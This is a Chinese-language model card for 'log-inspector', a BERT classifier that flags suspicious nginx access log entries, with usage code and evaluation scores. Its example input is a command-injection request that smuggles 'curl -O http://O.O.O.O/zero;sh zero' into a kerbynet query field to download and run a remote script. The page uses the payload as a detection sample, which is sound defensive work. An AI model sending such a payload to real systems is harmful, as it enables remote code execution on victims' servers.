log-inspector開源日誌檢測模型 - 免費部署精準識別可疑及安全日誌

首頁

Log Inspector

由u-haru開發

基於nginx訪問日誌的預訓練模型，用於檢測可疑日誌和安全日誌。

文本分類

Transformers

英語開源協議:Apache-2.0 #Nginx日誌分析 #惡意請求檢測 #BERT預訓練

下載量 138

發布時間 : 12/23/2022

模型概述

該模型基於bert-base-cased架構，專門用於分析nginx訪問日誌，能夠識別可疑的日誌條目。

模型特點

高準確率

在評估數據集上表現出高準確率，能夠有效區分可疑日誌和安全日誌。

預訓練模型

基於bert-base-cased預訓練模型，具備強大的文本理解能力。

簡單易用

提供transformers和simpletransformers兩種使用方式，方便快速集成。

模型能力

日誌分類

可疑日誌檢測

安全日誌識別

使用案例

網絡安全

可疑日誌檢測

檢測nginx訪問日誌中的可疑條目，如潛在的攻擊嘗試。

在10000條日誌上的評估結果顯示，模型能夠準確識別9964條可疑日誌。

🚀 日誌檢查器

該預訓練模型基於nginx訪問日誌，以bert-base-cased為基礎構建，可用於日誌檢查。

🚀 快速開始

本模型可用於檢查日誌。給定的文本必須按照如下格式解析： "path: <路徑>; ref:<引用頁>; ua:<用戶代理>;"

💻 使用示例

基礎用法

>>> from transformers import pipeline
>>> inspector = pipeline('text-classification', model="u-haru/log-inspector")
>>> inspector('path: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://O.O.O.O/zero;sh zero;"; ref:-; ua:-;')
[{'label': 'LABEL_0', 'score': 0.9999788999557495}]

類別0表示可疑日誌，類別1表示安全日誌。

高級用法

使用simpletransformer：

>>> from simpletransformers.classification import ClassificationModel
>>> model = ClassificationModel('bert', "u-haru/log-inspector", num_labels=2, use_cuda=(use_cuda and torch.cuda.is_available()), args=param)
>>> predictions, raw_outputs = model.predict(['path: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*";cd /tmp;curl -O http://O.O.O.O/zero;sh zero;"; ref:-; ua:-;'])
>>> print(predictions)
[0]

評估或訓練：

>>> from simpletransformers.classification import ClassificationModel
>>> model = ClassificationModel('bert', "u-haru/log-inspector", num_labels=2, use_cuda=(use_cuda and torch.cuda.is_available()), args=param)
>>> data = [["Suspicious log",0],["Safe log",1]]
>>> df = pd.DataFrame(data)

>>> model.train_model(df)
>>> result, model_outputs, wrong_predictions = model.eval_model(df)
>>> print(result)
{'mcc': 1.0, 'tp': 1, 'tn': 1, 'fp': 0, 'fn': 0, 'auroc': 1.0, 'auprc': 1.0, 'eval_loss': 1.8238850316265598e-05}

模型使用9500條訪問日誌進行訓練，以下是評估得分：

{'mcc': 0.993114718313972, 'tp': 1639, 'tn': 729, 'fp': 0, 'fn': 7, 'auroc': 0.9994166345815686, 'auprc': 0.9997937194890235, 'eval_loss': 0.020282083051662583}

使用10000條日誌進行評估的結果：

{'mcc': 0.8494104528008076, 'tp': 9964, 'tn': 26, 'fp': 0, 'fn': 10, 'auroc': 0.9999845752803442, 'auprc': 0.9999999597891697, 'eval_loss': 0.0058870489358901976}